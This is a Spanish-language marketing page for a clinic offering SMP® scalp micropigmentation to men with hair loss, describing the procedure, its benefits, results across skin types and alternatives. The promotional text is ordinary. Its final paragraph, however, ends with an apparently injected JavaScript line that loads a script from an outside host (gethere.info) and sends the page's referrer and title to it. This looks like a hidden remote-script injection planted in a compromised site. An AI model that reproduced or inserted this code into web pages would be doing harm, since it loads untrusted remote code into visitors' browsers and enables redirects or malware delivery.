TRATAMIENTO PARA LA PÉRDIDA DEL CABELLO

La técnica SMP® es un tratamiento altamente avanzado y moderno para la pérdida de cabello de los hombres que hace replica de los verdaderos folículos del pelo en el cuero cabelludo afeitado. La ilusión es tan realista que usted realmente creerá que tiene pelo.

La pigmentación del cuero cabelludo SMP® tratamiento de pérdida de cabello para hombres ofrece una solución ideal para muchos hombres sufren la caída del cabello. De las soluciones disponibles, pocas son tan inmediatas, permanentes, realistas y sin complicaciones, no invasivas y rentables como la técnica de pigmentación del cuero cabelludo SMP®.

¿QUE ES EL TRATAMIENTO ® SMP PARA LA PÉRDIDA DEL CABELLO?

La técnica SMP® (SCALP MICRO PIGMENTATION) , lo que en español vendría a ser “ micro pigmentation capilar, es un proceso muy detallado que crea una simulación de folículos increíblemente natural. Nuestra aplicación sofisticada se aplica en el cuero cabelludo de los hombres, por lo general requiere 2-3 sesiones entre las cuales ha de pasar una semana, para crear lo que muchos llaman la solución moderna definitiva para la caída del cabello.

hair loss treatment for men

Para los que sufren una pérdida de cabello normal o alopecia, la pigmentación del cuero cabelludo SMP® ofrece una eficaz solución cosmética. Se trata de una aplicación competente en el cuero cabelludo de pigmentoscreando una apariencia de un corte de pelo “rapado”, con independencia del nivel de pérdida de cabello que pueda tener. Incluso los clientes que están completamente calvos pueden tener un aspecto natural otra vez.

La técnica de pigmentación del cuero cabelludo SMP® no implica cirugías, ni cicatrices. No es necesario un continuo mantenimiento, a pesar de que muchos de nuestros clientes regresan a nuestra clínica de vez en cuando después de un tratamiento para adaptar un nuevo estilo. Nuestras consultas y tratamientos están respaldados por nuestro incomparable conocimiento y experiencia en el proceso de pigmentación del cuero cabelludo.

¿QUÉ BENEFICIOS TIENE LA TECNICA ® SMP PARA USTED?

La técnica SMP® ha ayudado a miles de hombres en todo el mundo para lograr una apariencia juvenil y moderna, Con la técnica SMP® se puede:

  • Crear el aspecto de una cabeza con mas densidad de cabello.
  • Volver a crear una línea frontal y lateral más juvenil.
  • Camuflar permanentemente los síntomas de la alopecia, severa o recurrente.
  • Camuflar cicatrices del trasplante capilar.
  • Ocultar marcas de nacimiento y cicatrices relacionadas con accidentes o quemaduras.
  • Combinar con un trasplante capilar para proporcionar densidad adicional.

¿QUÉ RESULTADOS SE PUEDE ESPERAR DEL ® SMP?

Este sitio cuenta con una galería, una videoteca y una sección de casos reales donde se muestran nuestros resultados. En estas secciones, tendrás la oportunidad de ver resultados en una gran variedad de clientes , que incluyen hombres con piel muy blanca, bronceada, gente hispana (piel mas oscura), del Medio Oriente, Asia, oriental, africana y afro-caribeña.

Sean cuales sean sus circunstancias o el resultado deseado, nuestro objetivo es satisfacer sus expectativas individuales y nuestro éxito dependerá de su satisfacción. Somos muy perfeccionistas cuando se trata de dar soluciones a la pérdida del cabello, trabajamos con vosotros para lograr el estilo natural y moderno mas apropiado para cada uno. Ofrecemos un excelente asesoramiento, tratamiento, orientación posterior y apoyo a lo largo del tratamiento asegurándonos de su bienestar a cada paso del camino.

¿Es la pigmentación CUERO SMP® LA SOLUCIÓN ADECUADA PARA USTED?

Si usted sufre pérdida de cabello y ha decidido tomar medidas, hay una gran variedad de soluciones disponibles, incluidos las protesis capilares, correctores, lociones y la cirugía de trasplante de cabello. La mayoría de nuestros clientes han probado varias de estas soluciones antes de acudir a nosotros, sin embargo, no quedaron satisfechos con los resultados obtenidos.

Creemos que nuestro tratamiento SMP® pigmentación del cuero cabelludo, ofrece una solución que se debe ser considerada seriamente frente a otras opciones como la cirugía de trasplante de cabello, protesis capilares, correctores, lociones y medicamentos.

Solo usted puede decidir cuál es la opción correcta a la hora de elegir entre una solución u otra. Considere los posibles compromisos de mantenimiento, de que manera la solución puede afectar a su estilo de vida, el grado de intervención que está dispuesto a tolerar, y por supuesto el coste.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

compártelo